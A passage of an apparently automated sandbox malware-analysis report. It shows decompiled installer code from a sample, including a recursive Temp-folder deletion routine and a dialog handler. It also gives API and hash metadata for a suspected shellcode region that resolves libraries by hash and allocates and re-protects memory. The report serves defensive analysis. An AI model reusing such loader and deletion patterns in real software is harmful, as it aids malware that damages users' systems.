					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c53
0x00405c58
0x00405c61
0x00405c64
0x00405c6c
0x00405c6f
0x00405c72
0x00405c7a
0x00405c7c
0x00405c7d
0x00000000
0x00405c7d
0x00405c88
0x00405c8b
0x00405c8b
0x00405c8b
0x00405c8f
0x00405ca2
0x00405ca9
0x00405cae
0x00405cb2
0x00405cc2
0x00405cb4
0x00405cba
0x00405cba
0x00405cc7
0x00405ccb
0x00405cd7
0x00405cdd
0x00405ce2
0x00405ce8
0x00405cf3
0x00405cf9
0x00405cfb
0x00405cfe
0x00405da8
0x00405da8
0x00405dac
0x00405dae
0x00405dae
0x00405dae
0x00405dae
0x00000000
0x00000000
0x00000000
0x00000000
0x00405d04
0x00405d04
0x00405d04
0x00405d0c
0x00405d2c
0x00405d34
0x00405d39
0x00405d40
0x00405d5b
0x00405d60
0x00405d62
0x00405d86
0x00405d64
0x00405d64
0x00405d67
0x00405d7b
0x00405d69
0x00405d6c
0x00405d74
0x00405d74
0x00405d67
0x00405d42
0x00405d48
0x00405d4a
0x00405d50
0x00405d50
0x00405d4a
0x00000000
0x00405d40
0x00405d0e
0x00405d16
0x00000000
0x00000000
0x00405d18
0x00405d20
0x00000000
0x00000000
0x00405d22
0x00405d2a
0x00000000
0x00000000
0x00000000
0x00405d8b
0x00405d93
0x00405d99
0x00405d99
0x00405da2
0x00000000
0x00405da2
0x00405ccd
0x00405cd5
0x00000000
0x00000000
0x00000000
0x00405c91
0x00405c91
0x00405c93
0x00405db3
0x00405db5
0x00405db8
0x00405e09
0x00405e09
0x00405e09
0x00405dba
0x00405dbd
0x00405dc8
0x00405dcd
0x00405dcf
0x00000000
0x00000000
0x00405dd2
0x00405dde
0x00405de3
0x00405de5
0x00000000
0x00405e00
0x00405de7
0x00405dea
0x00000000
0x00000000
0x00405def
0x00000000
0x00405df6
0x00405dbf
0x00405dbf
0x00000000
0x00405dbf
0x00405c99
0x00405c9c
0x00000000
0x00000000
0x00000000
0x00405c9c

APIs

DeleteFileW.KERNELBASE(?,?,758D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,758D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
FindFirstFileW.KERNELBASE(0042F270,?,?,?,0040A014,?,0042F270,?,?,758D3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNEL32(00000000), ref: 00405DA2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C56
., xrefs: 00405D04
., xrefs: 00405D18
\*.*, xrefs: 00405CB4

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1953461807
Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Uniqueness

Uniqueness Score: -1.00%

Function 02A16E42 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 305libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D8D691F9), ref: 02A23A2A

Strings

I5t#, xrefs: 02A1394B
7L%L, xrefs: 02A13960

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 7L%L$I5t#
API String ID: 1029625771-784189107
Opcode ID: 3ac12d9b9f14220a5cbd65554c7bbb94e2d28a928bf31a577478d4124f70f175
Instruction ID: e49837e027f0a506fdc5c0dcdd65ec4cbbf3d227f0c4e5663a709bfa272e340f
Opcode Fuzzy Hash: 3ac12d9b9f14220a5cbd65554c7bbb94e2d28a928bf31a577478d4124f70f175
Instruction Fuzzy Hash: C1A159716043498FDF348F788DA57EA37B6EF56360F95426DCC898B155CB32498ACB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A24745 Relevance: 3.3, APIs: 2, Instructions: 266memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02A2392F: LoadLibraryA.KERNELBASE(D8D691F9), ref: 02A23A2A

NtAllocateVirtualMemory.NTDLL ref: 02A24A2C

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 4203a71121eac1d6375b62c990a5390a1eccdd92cfd69c01643e146b9a85b5db
Instruction ID: 4d1a3c14a84c0f0c18008ec512e891d42bee65dfff417dc9c81f705cbe5a1bb5
Opcode Fuzzy Hash: 4203a71121eac1d6375b62c990a5390a1eccdd92cfd69c01643e146b9a85b5db
Instruction Fuzzy Hash: B3916B7564434A9FDF309E2C8D917DB37A3EF96390F948129DC898B158DB35868ACB01

Uniqueness

Uniqueness Score: -1.00%

Function 02A26CC0 Relevance: 3.1, APIs: 2, Instructions: 121COMMON

Download Yara Rule

APIs

K32EnumDeviceDrivers.KERNEL32(00000001,02A27418), ref: 02A26F68

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: DeviceDriversEnum
String ID:
API String ID: 22031212-0
Opcode ID: 44dd2fef3a381b7c7fa812e85b860248ac3815ef40645900b139c4d6dcb9b71f
Instruction ID: 9c7f206f8b40abd298429606c1accca7ee4f0b640246eb0e9d3e535507a60c9e
Opcode Fuzzy Hash: 44dd2fef3a381b7c7fa812e85b860248ac3815ef40645900b139c4d6dcb9b71f
Instruction Fuzzy Hash: 0D41E631A053199FDF30EE288A943DE37B79FA6790F94812ACC458B544DB36898DCF40

Uniqueness

Uniqueness Score: -1.00%

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}

0x0040687e
0x00406887
0x00000000
0x00406894
0x0040688a
0x00000000

APIs

FindFirstFileW.KERNELBASE(758D3420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,758D3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,758D3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
FindClose.KERNEL32(00000000), ref: 0040688A

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

Uniqueness

Uniqueness Score: -1.00%

Function 02A175B1 Relevance: 1.9, APIs: 1, Instructions: 351libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D8D691F9), ref: 02A23A2A

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d4dd0e3587b78aa38bfb4615eb89eb3ee3c73a8ae63a56fce3f3c59cabc192e5
Instruction ID: 653be51801465d8bf6d69672ba5f67c12966b357185921f0fd7121cb9442342b
Opcode Fuzzy Hash: d4dd0e3587b78aa38bfb4615eb89eb3ee3c73a8ae63a56fce3f3c59cabc192e5
Instruction Fuzzy Hash: 84B165315043568FDB216A389DE07EE7BE6EF822B0F548B1ACC91971D2DB304586CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02A1BD57 Relevance: 1.8, APIs: 1, Instructions: 275libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D8D691F9), ref: 02A23A2A

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6f67460f584da9063dbd61af1dc0a91d49606f2b3e1424c71994d1ba68d6535e
Instruction ID: 4a77a5b790b2889d2f711b0877cd6be589996539965cf0254e49d78779f33ece
Opcode Fuzzy Hash: 6f67460f584da9063dbd61af1dc0a91d49606f2b3e1424c71994d1ba68d6535e
Instruction Fuzzy Hash: 3EA16B75604316CFDF319E7889A43DA37B3EF66360FA4417ACC899B645D7320986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02A171CD Relevance: 1.7, APIs: 1, Instructions: 249libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D8D691F9), ref: 02A23A2A

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ca79111d6e633e84b0d68f008d9d6422bb34bf328ac4c5395f3c58ba445eaf3d
Instruction ID: dca43b68862d994243231be1a1cb01396faff1634ff9000748d1f505476a3e4f
Opcode Fuzzy Hash: ca79111d6e633e84b0d68f008d9d6422bb34bf328ac4c5395f3c58ba445eaf3d
Instruction Fuzzy Hash: 0B81287160431A9FDF34AE288D617EB77B3EF967A0F84852DDC8987254DB314986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02A17F07 Relevance: 1.7, APIs: 1, Instructions: 183libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D8D691F9), ref: 02A23A2A

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e55250a59492d83efed8e7ee5895e2f5874c568412d70dd2831adb11336541b8
Instruction ID: 776338cc4f249f22f8b2463854418bbe728028affb25a95875402104c6949079
Opcode Fuzzy Hash: e55250a59492d83efed8e7ee5895e2f5874c568412d70dd2831adb11336541b8
Instruction Fuzzy Hash: EA51CB315443499FCF31AE7889A83EF3BB3AF922A0FD5422ECC894B155DB35458ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 02A266BD Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-46C4ED9A,?,?,?,?,02A25938,-C2773318,02A136CB), ref: 02A26780

Memory Dump Source

Source File: 00000001.00000002.18483403549.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a10000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 735bba0c57e5266cd70fe5b6aab4427e9bf72ad5faad63e589f8ebda188852d1
Instruction ID: d32ec2992272df87bd8536f47068a674cc654f0a4b758dcfc36e75adec0f2e8d
Opcode Fuzzy Hash: 735bba0c57e5266cd70fe5b6aab4427e9bf72ad5faad63e589f8ebda188852d1
Instruction Fuzzy Hash: 97015AB17413898FEB25CE29CDE4BEEB6A6BFDD300F56803ADD099B245C7709E058650

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t146;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136; // 0x0
									if(__eflags != 0) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc - _t136; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									L28:
									return E00404500(_a8, _t122, _a16);
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136) {
							_t146 =  *0x433ed8 - _t136; // 0x103dc
							if(_t146 != 0) {
								ShowWindow(_t127, 0xa); // executed
								 *0x42f268 = 1;
							}
						}
						goto L63;
					}
					asm("sbb eax, eax");
					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
						goto L28;
					} else {
						ShowWindow(_t127, 4);
						goto L8;
					}
				}
			}

0x00403fa5
0x00403fac
0x00404113
0x00404117
0x0040411b
0x0040411d
0x00404122
0x0040412d
0x00404138
0x0040413d
0x0040413f
0x00404141
0x00404144
0x00404149
0x00404157
0x00404164
0x0040416b
0x0040416b
0x0040416c
0x0040416c
0x00404171
0x00404177
0x0040417e
0x00404184
0x00404186
0x004041c6
0x004041cb
0x004041d0
0x004041d0
0x004041d5
0x004041de
0x004041e0
0x004041e5
0x004041eb
0x004041ef
0x004041ef
0x004041f4
0x004041fa
0x00000000
0x00000000
0x00404205
0x0040420b
0x00000000
0x00000000
0x00404214
0x0040421c
0x00404221
0x00404224
0x0040422a
0x0040422f
0x00404232
0x00404238
0x0040423d
0x00404240
0x00404246
0x0040424e
0x00404254
0x0040425a
0x0040425e
0x00404265
0x00404265
0x00404265
0x0040426f
0x00404281
0x0040428d
0x00404292
0x0040429c
0x004042a2
0x004042a4
0x004042a9
0x004042a6
0x004042a6
0x004042a6
0x004042b9
0x004042d1
0x004042d3
0x004042d9
0x004042ee
0x004042db
0x004042e4
0x004042e6
0x004042e6
0x004042f4
0x00404305
0x0040431b
0x00404322
0x00404328
0x0040432c
0x00404331
0x00404333
0x00000000
0x00404339
0x00404339
0x0040433b
0x00000000
0x00000000
0x00404341
0x00404345
0x0040436a
0x00404370
0x00404376
0x00404378
0x00000000
0x00000000
0x0040439e
0x004043a4
0x004043a6
0x004043ab
0x00000000
0x00000000
0x004043b1
0x004043b4
0x004043b7
0x004043ce
0x004043da
0x004043f3
0x004043f9
0x004043fd
0x00404402
0x00404408
0x00000000
0x00000000
0x00404412
0x0040441d
0x00000000
0x0040441d
0x00404347
0x0040434d
0x00000000
0x00000000
0x00404353
0x00404359
0x00000000
0x00000000
0x00000000
0x0040435f
0x00404333
0x0040442a
0x00404436
0x0040443d
0x00000000
0x00404188
0x00404188
0x0040418b
0x004041be
0x004041be
0x004041c0
0x00000000
0x00000000
0x00000000
0x004041c0
0x0040418d
0x00404191
0x00404196
0x00404198
0x00000000
0x00000000
0x004041a8
0x004041b0
0x00000000
0x004041b6
0x00403fbe
0x00403fbe
0x00403fc2
0x00403fc7
0x00403fd6
0x00403fd6
0x00403fdc
0x00403fe3
0x00404027
0x0040402d
0x00404046
0x00404049
0x0040405c
0x00404062
0x00404100
0x00000000
0x00404109
0x00404068
0x00404073
0x00404075
0x00404077
0x00404096
0x00404096
0x00404099
0x0040409e
0x004040a1
0x004040b1
0x004040b2
0x004040b4
0x004040ea
0x004040fa
0x00000000
0x004040fa
0x004040b6
0x004040bc
0x004040d5
0x004040da
0x004040dc
0x00000000
0x00000000
0x004040de
0x004040ca
0x004040ca
0x004040cc
0x004040cc
0x00000000
0x004040cc
0x004040bf
0x004040c4
0x00000000
0x004040c4
0x004040a3
0x004040a9
0x00000000
0x00000000
0x004040ab
0x00000000
0x004040ab
0x0040409b
0x00000000
0x0040409b
0x00404081
0x00404088
0x0040408e
0x00404090
0x00404466
0x00000000
0x00404466
0x00000000
0x00404090
0x0040404e
0x00000000
0x00404056
0x00404035
0x0040403b
0x00404443
0x00404449
0x0040444b
0x00404451
0x00404456
0x0040445c
0x0040445c
0x00404451
0x00000000
0x00404449
0x00403fea
0x00403ff6
0x00403fff
0x00000000
0x0040401e
0x00404021
0x00000000
0x00404021
0x00403fff

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
